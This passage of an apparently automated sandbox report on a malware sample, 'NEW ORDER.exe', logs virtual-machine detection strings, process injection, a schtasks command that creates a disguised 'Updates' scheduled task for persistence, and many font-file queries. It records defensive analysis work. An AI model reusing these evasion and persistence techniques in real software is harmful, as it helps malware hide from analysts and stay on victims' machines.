                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                  Source: NEW ORDER.exe, 00000007.00000002.504032393.0000000006740000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlloo
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F4460 LdrInitializeThunk,
                  Source: C:\Users\user\Desktop\NEW ORDER.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\NEW ORDER.exeMemory written: C:\Users\user\Desktop\NEW ORDER.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvabCK" /XML "C:\Users\user\AppData\Local\Temp\tmp2F70.tmp
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Users\user\Desktop\NEW ORDER.exe {path}
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 488 -p 1468 -ip 1468
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Users\user\Desktop\NEW ORDER.exe VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
